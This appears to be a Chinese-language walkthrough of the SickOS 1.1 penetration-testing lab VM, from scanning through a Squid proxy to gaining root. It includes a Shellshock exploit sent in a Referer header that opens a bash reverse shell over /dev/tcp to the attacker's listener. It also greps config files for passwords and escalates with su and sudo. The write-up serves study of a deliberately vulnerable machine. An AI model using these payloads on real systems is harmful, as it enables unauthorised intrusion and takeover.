OSCP Sickos 1.1 靶机渗透
作者:互联网
Sickos 1.1 靶机渗透
目标:得到root权限
作者:shadow
时间:2021-03-23
请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。
一、信息收集
netdiscover -i eth0
Sickos 1.1主机ip为172.16.1.10
nmap 扫描一下
nmap -p- -A 172.16.1.10
主机开放了代理服务器,我们尝试用代理服务器扫描
nikto -h 172.16.1.10 --useproxy 172.16.1.10:3128
发现robots.txt 我们设置代理服务器查看文件
发现了/wolfcms目录,打开看看,没什么可用的,我们回到刚才nikto检测结果,提示/cgi-bin/status 对shellcode易受威胁,我们看下能否反弹shell
二、web渗透
开启msf监听
msfconsole
use multi/handler
set lhost 172.16.1.4
set lport 4444
set payload linux/x86/shell/reverse_tcp
run
开启另一个窗口发起请求,准备反弹shell
curl -v --proxy 172.16.1.10:3128 http://172.16.1.10/cgi-bin/status -H "Referer: () { test;}; echo 'Content-Type: text/plain'; echo; echo; /bin/bash -i >& /dev/tcp/172.16.1.4/4444 0>&1"
成功反弹shell
三、提权
切换交互式shell
/bin/sh
查看passwd文件,发现sickos用户
cat /etc/passwd
尝试寻找密码
find / -maxdepth 4 -name *.php -type f 2>/dev/null | xargs grep -C 3 -i pass
配置文件里面竟然有密码,为john@123
尝试切换用户
su sickos
成功切换到sickos用户
使用sudo命令切换到root用户
sudo su root
成功切换到root用户
四、总结
总体来说没什么难度
标签:bin,shell,1.1,1.10,代理服务器,172.16,root,Sickos,OSCP 来源: https://blog.csdn.net/qq_34935231/article/details/115134592